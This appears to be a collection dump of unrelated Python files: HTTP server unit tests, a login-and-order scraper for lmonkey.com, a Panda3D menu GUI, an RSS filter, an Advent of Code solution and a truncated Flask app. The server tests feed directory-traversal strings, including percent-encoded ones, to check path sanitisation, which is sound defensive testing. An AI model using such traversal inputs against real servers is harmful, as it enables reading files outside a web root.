req._parse_req_line(b'')
with self.assertRaises(http.BadHttpRequestError):
req._parse_req_line(b'GET /\r\n')
with self.assertRaises(http.BadHttpRequestError):
req._parse_req_line(b'GET / GARBAGE\r\n')
req._parse_req_line(b'GET / HTTP/1\r\n')
self.assertEqual(req.version, (1, 0))
def test_parse_header(self):
req = create_dummy_request()
req._parse_header(b'Server: Pyx\r\n')
self.assertEqual(req.headers, [http.HttpHeader('Server', 'Pyx')])
req.headers = []
with self.assertRaises(http.BadHttpHeaderError):
req._parse_header(b'Server\r\n')
req.headers = []
req._parse_header(b'Server:\r\n')
self.assertEqual(req.headers, [http.HttpHeader('Server', '')])
req.headers = []
req._parse_header(b'Server: \r\n')
self.assertEqual(req.headers, [http.HttpHeader('Server', '')])
req.headers = []
req._parse_header(b'Host: some.badasshost.com:8080\r\n')
self.assertEqual(req.headers, [http.HttpHeader('Host', 'some.badasshost.com:8080')])
with self.assertRaises(http.BadHttpHeaderError):
req._parse_header(b': pyx\r\n')
with self.assertRaises(http.BadHttpHeaderError):
req._parse_header(b' : pyx')
with self.assertRaises(http.BadHttpHeaderError):
req._parse_header(b' \t : pyx')
def test_parse(self):
loop = asyncio.get_event_loop()
conn = create_dummy_connection()
reader = conn.reader
reader.feed_data(
b'GET /?q=p&s=t HTTP/1.1\r\n'
b'Host: localhost\r\n'
b'Connection: Keep-Alive\r\n'
b'Pragma: Test\r\n'
b' : Test\r\n'
b'\r\n')
req = loop.run_until_complete(http.HttpRequest.parse(conn))
self.assertEqual(req.method, 'GET')
self.assertEqual(req.path, '/')
self.assertEqual(req.query, 'q=p&s=t')
self.assertEqual(req.protocol, 'HTTP')
self.assertEqual(req.version, (1, 1))
self.assertEqual(req.headers,
[
http.HttpHeader('Host', 'localhost'),
http.HttpHeader('Connection', 'Keep-Alive'),
http.HttpHeader('Pragma', 'Test'),
])
def test_respond(self):
req = create_dummy_request()
req.version = (1, 1)
resp = req.respond(200)
self.assertEqual(resp.code, 200)
self.assertEqual(resp.version, (1, 1))
req.version = (1, 0)
resp = req.respond(400)
self.assertEqual(resp.code, 400)
self.assertEqual(resp.version, (1, 0))
class TestHttpResponse(unittest.TestCase):
def test_write(self):
resp = http.HttpResponse(200, None)
resp.headers = [
http.HttpHeader('Server', 'Pyx'),
http.HttpHeader('Connection', 'keep-alive')
]
self.assertEqual(resp.write(),
['HTTP/1.1 200 OK',
'Server: Pyx',
'Connection: keep-alive',
'\r\n'])
self.assertEqual(str(resp),
'HTTP/1.1 200 OK\r\n'
'Server: Pyx\r\n'
'Connection: keep-alive\r\n'
'\r\n')
def test_send(self):
loop = asyncio.get_event_loop()
req = create_dummy_request()
resp = req.respond(200)
self.assertEqual(resp.code, 200)
self.assertFalse(req.responded)
resp.headers = [
http.HttpHeader('Server', 'Pyx'),
http.HttpHeader('Content-Length', '100'),
http.HttpHeader('Content-Type', 'text/plain'),
]
loop.run_until_complete(resp.send())
resp.connection.writer.write.assert_called_with(str(resp).encode())
self.assertTrue(req.responded)
def test_send_body(self):
loop = asyncio.get_event_loop()
req = create_dummy_request()
resp = req.respond(200)
loop.run_until_complete(resp.send())
self.assertTrue(req.responded)
loop.run_until_complete(resp.send_body(b'Yes, this is the body.'))
resp.connection.writer.write.assert_called_with(b'Yes, this is the body.')
loop.run_until_complete(resp.send_body('This is another string body.'))
resp.connection.writer.write.assert_called_with(b'This is another string body.')
class DummyResource(http.UrlResource):
def get_child(self, key):
if key == 'hello':
return self
elif key == "static":
return http.StaticRootResource('.')
else:
raise http.HttpError(404, '{} not found'.format(key))
class TestUrlResource(unittest.TestCase):
def test_traverse(self):
res = DummyResource()
self.assertEqual(res.traverse(''), res)
self.assertEqual(res.traverse('/'), res)
self.assertEqual(res.traverse('/hello'), res)
with self.assertRaises(http.HttpError):
res.traverse('/does/not/exist')
sres = res.traverse('/static')
self.assertEqual(sres.root, '.')
self.assertEqual(sres._build_real_path(), '.')
sres = res.traverse('/static/')
self.assertEqual(sres._build_real_path(), '.')
sres = res.traverse('/static/some/path')
self.assertEqual(sres._build_real_path(), './some/path')
def test_not_implemented(self):
res = http.UrlResource()
with self.assertRaises(NotImplementedError):
res.traverse('/hello')
req = create_dummy_request()
with self.assertRaises(NotImplementedError):
res.handle_request(req)
class TestStaticRootResource(unittest.TestCase):
def test_build_real_path(self):
res = http.StaticRootResource('local_root')
res = res.traverse('/some/long/path/where/ever/it/leads/')
self.assertEqual(res._build_real_path(),
'local_root/some/long/path/where/ever/it/leads')
res = http.StaticRootResource('local_root')
res = res.traverse('/some/../dangerous/path')
self.assertEqual(res._build_real_path(),
'local_root/dangerous/path')
res = http.StaticRootResource('local_root')
res = res.traverse('/some/../../dangerous/path')
self.assertEqual(res._build_real_path(),
'local_root/dangerous/path')
res = http.StaticRootResource('local_root')
res = res.traverse('/some/%2e%2e%2f%2e%2e/dangerous/path')
self.assertEqual(res._build_real_path(),
'local_root/dangerous/path')
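The traversal tests above pin down the sanitization contract: percent-escapes are decoded first, then '..' segments are resolved against a segment stack that is clamped at the local root, so a request can never escape it. A minimal sketch of that contract (illustrative only, not pyx's actual implementation):

from urllib.parse import unquote

def build_real_path(root, path):
    # Decode percent-escapes (e.g. '%2e%2e%2f' -> '../') before splitting,
    # so encoded traversal sequences get the same treatment as literal ones.
    parts = []
    for seg in unquote(path).split('/'):
        if seg in ('', '.'):
            continue
        if seg == '..':
            if parts:
                parts.pop()  # resolve '..', but never climb above the root
            continue
        parts.append(seg)
    return '/'.join([root] + parts) if parts else root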
| 33.511111
| 92
| 0.59527
| 1,049
| 9,048
| 4.987607
| 0.148713
| 0.12328
| 0.061927
| 0.025994
| 0.639526
| 0.522362
| 0.477446
| 0.408257
| 0.36143
| 0.260703
| 0
| 0.011743
| 0.265915
| 9,048
| 269
| 93
| 33.635688
| 0.775971
| 0
| 0
| 0.318841
| 0
| 0.004831
| 0.138594
| 0.039567
| 0
| 0
| 0
| 0
| 0.294686
| 1
| 0.082126
| false
| 0
| 0.019324
| 0
| 0.154589
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1 | 0 |
d5c480f55405e4b344842fed3a1082b875de03dd | 1,349 | py | Python | main.py | DuskXi/ArkX | 7b416ae0c4ec2b383c6f414ed475930dd228909f | ["Apache-2.0"] | 2 | 2022-02-18T03:08:38.000Z | 2022-03-03T04:20:08.000Z | main.py | DuskXi/ArkX | 7b416ae0c4ec2b383c6f414ed475930dd228909f | ["Apache-2.0"] | null | null | null | main.py | DuskXi/ArkX | 7b416ae0c4ec2b383c6f414ed475930dd228909f | ["Apache-2.0"] | null | null | null |
import os
import json
from File.file import File
os.environ['TF_CPP_MIN_LOG_LEVEL'] = '3'
def fileRead(fileName, encoding='utf-8'):
with open(fileName, encoding=encoding) as f:
return f.read()
def main():
from Automation.distributor import Distributor
from Performance import recoder
from WebInterface import web
modelConfig = json.loads(fileRead("config/model.json"))
labelsName = json.loads(fileRead("config/labelsName.json"))
config = json.loads(fileRead("config/config.json"))
# file = File()
classifyModel = modelConfig["imageClassificationModel"]
# if not file.mergedFile(classifyModel["filePath"], classifyModel["fileName"], classifyModel["files"]):
# print("文件合并失败")
# print("回车退出")
# input()
# exit(0)
recoder.Recoder.debug = False
recoder.Recoder.debugSleepingTime = 60 * 60
recoder.Recoder.initDataSet([modelConfig["objectDetectionModel"]["modelName"], modelConfig["addSanityModel"]["modelName"]],
[classifyModel["modelName"]])
# modelConfig["imageClassificationModel"]["filePath"] = os.path.join(classifyModel["filePath"], classifyModel["fileName"])
distributor = Distributor(modelConfig, config["adb_path"], labelsName)
web.run(distributor, config)
if __name__ == "__main__":
main()
| 30.659091
| 127
| 0.681987
| 136
| 1,349
| 6.669118
| 0.455882
| 0.029768
| 0.056229
| 0.076075
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.006346
| 0.182357
| 1,349
| 43
| 128
| 31.372093
| 0.815956
| 0.220904
| 0
| 0
| 0
| 0
| 0.176414
| 0.044104
| 0
| 0
| 0
| 0
| 0
| 1
| 0.086957
| false
| 0
| 0.26087
| 0
| 0.391304
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1 | 0 |
d5c68966a759ee86d163e95dee1679657c063de3 | 2,236 | py | Python | Python Spider/xpath/03 login.py | CodingGorit/Coding-with-Python | b0f1d5d704b816a85b0ae57b46d00314de2a67b9 | ["Apache-2.0"] | 1 | 2020-01-31T15:57:29.000Z | 2020-01-31T15:57:29.000Z | Python Spider/xpath/03 login.py | CodingGorit/Coding-with-Python | b0f1d5d704b816a85b0ae57b46d00314de2a67b9 | ["Apache-2.0"] | null | null | null | Python Spider/xpath/03 login.py | CodingGorit/Coding-with-Python | b0f1d5d704b816a85b0ae57b46d00314de2a67b9 | ["Apache-2.0"] | null | null | null |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#file: 03 login.py
#@author: Gorit
#@contact: gorit@qq.com
#@time: 2020/1/20 12:44
import requests
from lxml import etree
# Wrapper class: handles logging in to lmonkey.com and fetching the order list
class lMonKey():
# Login request URL
loginUrl = "https://www.lmonkey.com/login"
# Account center URL
orderUrl = "https://www.lmonkey.com/my/order"
headers = {
"User-Agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.25 Safari/537.36 Core/1.70.3741.400 QQBrowser/10.5.3863.400"
}
# Session/request object
req = None
# CSRF token
token = ''
# Order number
# Initializer
def __init__(self):
# Initialize the session object
self.req = requests.session()
if self.getlogin(): # GET login succeeded
if self.postlogin(): # POST login succeeded
self.getordder()
# GET the login page and extract _token
def getlogin(self):
# 1. GET the login page, set cookies, and extract _token
res = self.req.get(url=self.loginUrl,headers=self.headers)
if res.status_code == 200:
print("get 页面请求成功")
html = etree.HTML(res.text)
self.token = html.xpath("//input[@name='_token']/@value")[0]
#Find the input tag with the attribute name="_token" and read its value attribute, i.e. the token
# input[@name='xxx'] selects the tag with that attribute
print("token 获取成功")
return True
else:
print("请求错误")
# post 登录,设置 cookie
def postlogin(self):
uname = input("输入你的手机号:")
passw = input("请输入你的密码:")
data = {
"_token": self.token,
"username": uname,
"password": passw
}
# Send the POST request
res = self.req.post(url=self.loginUrl,headers=self.headers,data=data)
if res.status_code==200 or res.status_code==302:
print("登录成功!!")
return True
def getordder(self):
# Fetch the order page with a plain GET and grab the default order number
# then just parse the data
res = self.req.get(url=self.orderUrl,headers=self.headers)
if res.status_code == 200:
print("请求订单页页面成功")
html = etree.HTML(res.text)
# 頁面解析
r = html.xpath("//div[@class='avatar-content']/small/text()")
print(r)
else:
print("頁面請求失敗")
obj = lMonKey()
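One fragile spot in getlogin: html.xpath(...)[0] raises an IndexError if the login form ever stops shipping the hidden _token input. A defensive variant of those two lines (a sketch, same XPath):

tokens = html.xpath("//input[@name='_token']/@value")
self.token = tokens[0] if tokens else ''  # fall back to an empty token instead of crashing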
| 27.268293
| 175
| 0.549195
| 280
| 2,236
| 4.339286
| 0.507143
| 0.023045
| 0.042798
| 0.037037
| 0.181893
| 0.134156
| 0.06749
| 0.06749
| 0.06749
| 0
| 0
| 0.048021
| 0.310823
| 2,236
| 81
| 176
| 27.604938
| 0.740428
| 0.18381
| 0
| 0.170213
| 0
| 0.021277
| 0.210556
| 0.053333
| 0
| 0
| 0
| 0
| 0
| 1
| 0.085106
| false
| 0.042553
| 0.042553
| 0
| 0.297872
| 0.148936
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1 | 0 |
d5c72a3c1f9827cd7d71f3da809f2313db6f0a32 | 9,730 | py | Python | src/gui/MultiplayerPlayerInfo.py | fireclawthefox/AnkandoraLight | 05b71e1a2919141cce02cb1aade95fbac682614b | ["BSD-2-Clause"] | 3 | 2020-07-31T10:27:06.000Z | 2022-01-11T20:28:55.000Z | src/gui/MultiplayerPlayerInfo.py | fireclawthefox/AnkandoraLight | 05b71e1a2919141cce02cb1aade95fbac682614b | ["BSD-2-Clause"] | null | null | null | src/gui/MultiplayerPlayerInfo.py | fireclawthefox/AnkandoraLight | 05b71e1a2919141cce02cb1aade95fbac682614b | ["BSD-2-Clause"] | 1 | 2020-07-30T08:23:28.000Z | 2020-07-30T08:23:28.000Z |
#!/usr/bin/python
# -*- coding: utf-8 -*-
# This file was created using the DirectGUI Designer
from direct.gui import DirectGuiGlobals as DGG
from direct.gui.DirectFrame import DirectFrame
from direct.gui.DirectLabel import DirectLabel
from direct.gui.DirectButton import DirectButton
from direct.gui.DirectOptionMenu import DirectOptionMenu
from panda3d.core import (
LPoint3f,
LVecBase3f,
LVecBase4f,
TextNode
)
class GUI:
def __init__(self, rootParent=None):
self.frmMain = DirectFrame(
frameColor=(1, 1, 1, 1),
frameSize=(-1.777778, 1.77777778, -1.1638, 1.1638),
hpr=LVecBase3f(0, 0, 0),
image='assets/menu/Background.png',
pos=LPoint3f(0, 0, 0),
image_scale=LVecBase3f(1.77778, 1, 1.1638),
image_pos=LPoint3f(0, 0, 0),
parent=rootParent,
)
self.frmMain.setTransparency(0)
self.frmSinglePlayerCreateGame = DirectFrame(
borderWidth=(0.01, 0.01),
frameColor=(1, 1, 1, 1),
frameSize=(-0.65, 0.65, -0.55, 0.55),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.425, 0, 0),
relief=5,
parent=self.frmMain,
)
self.frmSinglePlayerCreateGame.setTransparency(0)
self.pg703 = DirectLabel(
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(0, 0, 0.425),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Player Info',
text_align=TextNode.A_center,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmSinglePlayerCreateGame,
)
self.pg703.setTransparency(0)
self.pg13803 = DirectButton(
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.35, 0, -0.45),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Start',
text_align=TextNode.A_center,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmSinglePlayerCreateGame,
command=base.messenger.send,
extraArgs=["multiplayerPlayerInfo_start"],
)
self.pg13803.setTransparency(0)
self.pg5219 = DirectLabel(
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.6, 0, 0.02),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Player Class',
text_align=TextNode.A_left,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmSinglePlayerCreateGame,
)
self.pg5219.setTransparency(0)
self.optionPlayerClass = DirectOptionMenu(
items=['item1'],
frameSize=(0.07500000298023224, 3.012500149011612, -0.11250001192092896, 0.75),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(0.2, 0, 0.005),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='item1',
cancelframe_frameSize=(-1, 1, -1, 1),
cancelframe_hpr=LVecBase3f(0, 0, 0),
cancelframe_pos=LPoint3f(0, 0, 0),
cancelframe_relief=None,
item_frameSize=(0.07500000298023224, 2.4125001430511475, -0.11250001192092896, 0.75),
item_hpr=LVecBase3f(0, 0, 0),
item_pos=LPoint3f(-0.075, 0, -0.75),
item_text='item1',
item0_text_align=TextNode.A_left,
item0_text_scale=(1, 1),
item0_text_pos=(0, 0),
item0_text_fg=LVecBase4f(0, 0, 0, 1),
item0_text_bg=LVecBase4f(0, 0, 0, 0),
item0_text_wordwrap=None,
popupMarker_frameSize=(-0.5, 0.5, -0.2, 0.2),
popupMarker_hpr=LVecBase3f(0, 0, 0),
popupMarker_pos=LPoint3f(2.7125, 0, 0.31875),
popupMarker_relief=2,
popupMarker_scale=LVecBase3f(0.4, 0.4, 0.4),
popupMenu_frameSize=(0, 2.3375001400709152, -0.862500011920929, 0),
popupMenu_hpr=LVecBase3f(0, 0, 0),
popupMenu_pos=LPoint3f(0, 0, 0),
popupMenu_relief='raised',
text_align=TextNode.A_left,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmSinglePlayerCreateGame,
)
self.optionPlayerClass.setTransparency(0)
self.btnCancel = DirectButton(
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(0.325, 0, -0.45),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Cancel',
text_align=TextNode.A_center,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmSinglePlayerCreateGame,
command=base.messenger.send,
extraArgs=["multiplayerPlayerInfo_cancel"],
)
self.btnCancel.setTransparency(0)
self.frmPlayerInfo = DirectFrame(
borderWidth=(0.01, 0.01),
frameColor=(1, 1, 1, 1),
frameSize=(-0.5, 0.5, -0.55, 0.55),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(0.765, 0, 0),
relief=3,
parent=self.frmMain,
)
self.frmPlayerInfo.setTransparency(0)
self.lblInfoHeader = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(0, 0, 0.45),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Info',
text_align=TextNode.A_center,
text_scale=(1, 1),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmPlayerInfo,
)
self.lblInfoHeader.setTransparency(0)
self.frmImageHero = DirectFrame(
frameColor=(1, 1, 1, 1),
frameSize=(-0.15, 0.15, -0.2, 0.2),
hpr=LVecBase3f(0, 0, 0),
image='/home/fireclaw/workspace/Ankandora/AnkandoraLight/design/guiGraphics/heroArcher.png',
pos=LPoint3f(-0.275, 0, 0.195),
image_scale=LVecBase3f(0.15, 1, 0.2),
image_pos=LPoint3f(0, 0, 0),
parent=self.frmPlayerInfo,
)
self.frmImageHero.setTransparency(1)
self.lblClassDescription = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.12, 0, 0.31),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='The archer shoots from afar and gains the first-strike',
text_align=TextNode.A_left,
text_scale=(0.6, 0.6),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=10.0,
parent=self.frmPlayerInfo,
)
self.lblClassDescription.setTransparency(0)
self.lblHealth = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.28, 0, -0.1),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Health',
text_align=TextNode.A_center,
text_scale=(0.7, 0.7),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmPlayerInfo,
)
self.lblHealth.setTransparency(0)
self.lblAttack = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.275, 0, -0.285),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='Attack',
text_align=TextNode.A_center,
text_scale=(0.7, 0.7),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmPlayerInfo,
)
self.lblAttack.setTransparency(0)
self.lblHealthValue = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.275, 0, -0.17),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='7',
text_align=TextNode.A_center,
text_scale=(0.6, 0.6),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmPlayerInfo,
)
self.lblHealthValue.setTransparency(0)
self.lblAttackValue = DirectLabel(
frameColor=(0.8, 0.8, 0.8, 0.0),
hpr=LVecBase3f(0, 0, 0),
pos=LPoint3f(-0.275, 0, -0.36),
scale=LVecBase3f(0.1, 0.1, 0.1),
text='4',
text_align=TextNode.A_center,
text_scale=(0.6, 0.6),
text_pos=(0, 0),
text_fg=LVecBase4f(0, 0, 0, 1),
text_bg=LVecBase4f(0, 0, 0, 0),
text_wordwrap=None,
parent=self.frmPlayerInfo,
)
self.lblAttackValue.setTransparency(0)
def show(self):
self.frmMain.show()
def hide(self):
self.frmMain.hide()
def destroy(self):
self.frmMain.destroy()
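A minimal usage sketch (assumes a running Panda3D ShowBase, which provides the global `base` that the buttons' messenger commands rely on):

from direct.showbase.ShowBase import ShowBase

app = ShowBase()
gui = GUI()   # builds the frames and widgets under the default GUI root
gui.show()
app.run()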
| 35.126354
| 104
| 0.528777
| 1,198
| 9,730
| 4.196995
| 0.128548
| 0.057279
| 0.036993
| 0.062053
| 0.589897
| 0.554694
| 0.539578
| 0.50358
| 0.498011
| 0.442323
| 0
| 0.133963
| 0.336382
| 9,730
| 276
| 105
| 35.253623
| 0.644727
| 0.009147
| 0
| 0.484
| 0
| 0
| 0.030193
| 0.017016
| 0
| 0
| 0
| 0
| 0
| 1
| 0.016
| false
| 0
| 0.024
| 0
| 0.044
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1 | 0 |
d5c7e9662e071c24633307f69bc18856ffa49ecf | 634 | py | Python | publications/time_mag.py | mkoo21/rss-review-scraper | 4adde8586ce55d7bb211bcfbb9bcccd1edc8b6a5 | ["BSD-3-Clause"] | null | null | null | publications/time_mag.py | mkoo21/rss-review-scraper | 4adde8586ce55d7bb211bcfbb9bcccd1edc8b6a5 | ["BSD-3-Clause"] | 1 | 2021-06-01T23:47:57.000Z | 2021-06-01T23:47:57.000Z | publications/time_mag.py | mkoo21/rss-review-scraper | 4adde8586ce55d7bb211bcfbb9bcccd1edc8b6a5 | ["BSD-3-Clause"] | null | null | null |
from . import FROM_FEED_PUBLISHED_TODAY, STRINGIFY
def filter_by_tag(tag, entries):
matches = list(filter(
lambda x: any(list(map(
lambda y: y.term == tag,
x.tags
))),
entries
))
if len(matches) == 0:
return ""
return "<h2>TIME {} - {} results</h2>".format(tag, len(matches)) + \
"".join(list(map(lambda x: STRINGIFY(x, 'TIME'), matches)))
def TIME():
pub_today = FROM_FEED_PUBLISHED_TODAY('https://feeds2.feedburner.com/time/entertainment')
return filter_by_tag('movies', pub_today) + \
filter_by_tag('Television', pub_today)
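The nested filter/map/lambda pipeline in filter_by_tag can be read more directly as a comprehension; an equivalent sketch of the matching step:

# keep entries that carry at least one tag whose term equals `tag`
matches = [e for e in entries if any(t.term == tag for t in e.tags)]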
| 28.818182
| 93
| 0.594637
| 79
| 634
| 4.582278
| 0.468354
| 0.066298
| 0.09116
| 0.121547
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.008475
| 0.255521
| 634
| 21
| 94
| 30.190476
| 0.758475
| 0
| 0
| 0
| 0
| 0
| 0.152997
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.117647
| false
| 0
| 0.058824
| 0
| 0.352941
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1 | 0 |
d5c8ad01f8962aad9216b71e8846b60294d68306 | 3,017 | py | Python | 2020/21/code.py | irobin591/advent-of-code-2019 | 279c28a2863558bd014b289802fff4b444c5d6cf | ["MIT"] | null | null | null | 2020/21/code.py | irobin591/advent-of-code-2019 | 279c28a2863558bd014b289802fff4b444c5d6cf | ["MIT"] | null | null | null | 2020/21/code.py | irobin591/advent-of-code-2019 | 279c28a2863558bd014b289802fff4b444c5d6cf | ["MIT"] | null | null | null |
# Advent of Code 2020
# Day 21
# Author: irobin591
import os
import doctest
import re
re_entry = re.compile(r'^([a-z ]+) \(contains ([a-z, ]*)\)$')
with open(os.path.join(os.path.dirname(__file__), "input.txt"), 'r') as input_file:
input_data = input_file.read().strip().split('\n')
def part1(input_data):
"""
>>> part1(open(os.path.join(os.path.dirname(__file__), "test_part1.txt"), 'r').read().strip().split('\\n'))
5
"""
# dict['allergen'] = ['asdfa', 'agbsfb']
allergens = {}
ingredients = []
# map strings to allergens
for entry in input_data:
r = re_entry.match(entry)
if not r:
raise RuntimeError("")
contents = set(r.group(1).split(' '))
ingredients.extend(contents)
for allergen in r.group(2).split(', '):
if allergen not in allergens:
allergens[allergen] = contents
else:
# only keep already added ingredients
allergens[allergen] = [ingredient for ingredient in contents if ingredient in allergens[allergen]]
# print(allergens)
# print(ingredients)
ingredients_with_allergens = set([y for x in allergens.values() for y in x])
# print(list(filter(lambda i: i not in ingredients_with_allergens, ingredients)))
return len(list(filter(lambda i: i not in ingredients_with_allergens, ingredients)))
def part2(input_data):
"""
>>> part2(open(os.path.join(os.path.dirname(__file__), "test_part1.txt"), 'r').read().strip().split('\\n'))
'mxmxvkd,sqjhc,fvjkl'
"""
# dict['allergen'] = ['asdfa', 'agbsfb']
allergens = {}
ingredients = []
# map strings to allergens
for entry in input_data:
r = re_entry.match(entry)
if not r:
raise RuntimeError("")
contents = set(r.group(1).split(' '))
ingredients.extend(contents)
for allergen in r.group(2).split(', '):
if allergen not in allergens:
allergens[allergen] = list(contents)
else:
# only keep already added ingredients
allergens[allergen] = [ingredient for ingredient in contents if ingredient in allergens[allergen]]
# print(allergens)
# (allergen, ingredient)
assigned_allergens = []
while sum([len(ingreds) for ingreds in allergens.values()]) > 0:
for allergen in allergens:
if len(allergens[allergen]) == 1:
ingredient = allergens[allergen][0]
assigned_allergens.append((allergen, ingredient))
for allergen2 in allergens:
if ingredient in allergens[allergen2]:
allergens[allergen2].remove(ingredient)
assigned_allergens.sort(key=lambda x: x[0])
return ",".join([x[1] for x in assigned_allergens])
if __name__ == "__main__":
doctest.testmod()
print("Part One: {}".format(part1(input_data)))
print("Part Two: {}".format(part2(input_data)))
pass
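Since `contents` is built as a set, the pruning step in both parts can also be written as a set intersection (an equivalent sketch, assuming allergens[allergen] is kept as a set rather than converted to a list):

# keep only candidate ingredients that appear in every entry listing this allergen
allergens[allergen] = allergens[allergen] & contents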
| 30.785714
| 114
| 0.599271
| 355
| 3,017
| 4.969014
| 0.270423
| 0.056122
| 0.017007
| 0.02381
| 0.576531
| 0.576531
| 0.576531
| 0.576531
| 0.558957
| 0.558957
| 0
| 0.013483
| 0.262512
| 3,017
| 98
| 115
| 30.785714
| 0.779326
| 0.2118
| 0
| 0.461538
| 0
| 0
| 0.036989
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.038462
| false
| 0.019231
| 0.057692
| 0
| 0.134615
| 0.038462
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1 | 0 |
d5cb7cb45edf1a90b51258da74fc6a1d2b6758fa | 2,761 | py | Python | app.py | iandees/microdata2osm | 1505b8072880055033ddbb85626fcdb857c97d4e | ["MIT"] | 1 | 2019-11-05T16:02:17.000Z | 2019-11-05T16:02:17.000Z | app.py | iandees/microdata2osm | 1505b8072880055033ddbb85626fcdb857c97d4e | ["MIT"] | null | null | null | app.py | iandees/microdata2osm | 1505b8072880055033ddbb85626fcdb857c97d4e | ["MIT"] | null | null | null |
from flask import Flask, jsonify, request
from w3lib.html import get_base_url
import extruct
import requests
app = Flask(__name__)
def extract_osm_tags(data):
tags = {}
schema_org_type = data.get('@type')
if schema_org_type == 'Restaurant':
tags['amenity'] = 'restaurant'
# servesCuisine is a property of the incoming schema.org data, not of the
# freshly built tags dict, so read it from data
serves_cuisine = data.get('servesCuisine')
if serves_cuisine:
cuisine = []
if 'Burgers' in serves_cuisine:
cuisine.append('burger')
if 'Fast Casual' in serves_cuisine:
tags['amenity'] = 'fast_food'
if cuisine:
